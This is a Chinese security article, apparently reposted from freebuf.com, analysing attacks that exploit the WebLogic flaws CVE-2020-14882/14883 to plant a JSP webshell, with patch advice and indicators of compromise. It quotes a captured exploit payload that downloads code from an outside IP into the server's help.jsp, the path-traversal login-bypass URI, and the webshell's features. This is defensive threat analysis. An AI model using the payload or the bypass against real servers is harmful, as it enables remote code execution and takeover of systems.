子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

近期基于Weblogic未授权命令执行的漏洞分析 – 作者:ArseneLupin

080

漏洞简介

漏洞发展史

2020年10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中组合利用 CVE-2020-14882/ CVE-2020-14883可使未经授权的攻击者绕过WebLogic后台登录等限制,最终远程执行代码接管WebLogic服务器,利用难度极低,风险极大。

2020年10月29日该漏洞出现EXP,随即而来的是各种挖矿团伙新的C2通信的方式以及各种小黑们新的Webshell上传的姿势。

漏洞编号

CVE-2020-14882、CVE-2020-14883

漏洞等级

高危,CVSS 评分 9.8

受影响的版本

10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

漏洞修复

此次Oracle官方的CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

基于Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的Webshell大马上传

近期有很多基于该漏洞利用的攻击行为,其中一个webshell大马详情如下:

payload

handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22java.nio.file.Files.copy%28new+java.net.URL%28%27http%3A%2F%2F46.183.223.11%2F2908.txt%27%29.openStream%28%29%2C+new+java.io.File%28%27..%2F..%2F..%2Fwlserver%2Fserver%2Flib%2Fconsoleapp%2Fconsolehelp%2Fhelp.jsp%27%29.toPath%28%29%2C+java.nio.file.StandardCopyOption.REPLACE_EXISTING%29%3B%22%29%3B

url_decode解码后结果如下:

handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.nio.file.Files.copy(new+java.net.URL(\’http://46.183.223.11/2908.txt\’).openStream(),+new+java.io.File(\’../../../wlserver/server/lib/consoleapp/consolehelp/help.jsp\’).toPath(),+java.nio.file.StandardCopyOption.REPLACE_EXISTING);”);

其中有url http[:]//46.183.223.11/2908.txt,该payload主要是从C2服务器获取webshell大马,然后写入到help.jsp。查询IP地址46.183.223.11可知其存在垃圾邮件、傀儡机等标签。

1605001918_5faa62be7048265048a99.png!small?1605001919297

uri

/console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLable=

从uri可知此为该漏洞的EXP中的其中一种方式。

Webshell大马

根据url http[:]//46.183.223.11/2908.txt,下载文件可其为jsp类型的webshell

1605007050_5faa76ca238486f18aeb3.png!small?1605007050986

样本留有作者的标签 “Author:God”,一位自称为上帝的作者,这是一种怎样自我崇拜的心理?caption字段定义的为该webshell 访问的密码的MD5(f6f5489634f0b7ffaf80160f6d1366ec),并且后面的代码也验证了这一点。

1605008374_5faa7bf6e2e77906c8431.png!small?16050083743291605008846_5faa7dce60d14dd252fa5.png!small?1605008845610

该大马主要有获取系统信息,目录浏览,文件上传、下载、编辑以及命令执行等。

1605009110_5faa7ed638d8809cf2175.png!small?1605009109474

Webshell复现

将该webshell部署到之前利用docker搭建的tomcat服务中,访问结果如下:

1605009328_5faa7fb04865cdb1a7469.png!small?1605009327547windows上命令执行,

1605009701_5faa8125e96fb1e273703.png!small?1605009701176获取系统信息

1605009684_5faa81141221024514a29.png!small?1605009683337

总结

近期,随着Weblogic未授权命令执行漏洞EXP的面世,产出了新的webshell 上传的姿势和各种挖矿团伙的新的C2样本。所以时刻关注着新漏洞的EXP,该EXP利用成本和效益,都能从中发现新的方式和新的收获。

防护建议

大家及时打补丁,可以搜索受否存在2908.txt文件并删除,或封锁ip 46.183.223.11等。

IOC

CVE
CVE-2020-14882
CVE-2020-14883
url
http[:]//46.183.223.11/2908.txt
md5
62138c4884af2f086b2dc46beedc24ec

来源:freebuf.com 2020-11-10 20:29:30 by: ArseneLupin

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 1591
安全小百科-科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
3年前 875
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 748
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 635
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 548
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
048120
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47320
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
015910
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
011380
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
010320
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
08750
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛9月前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666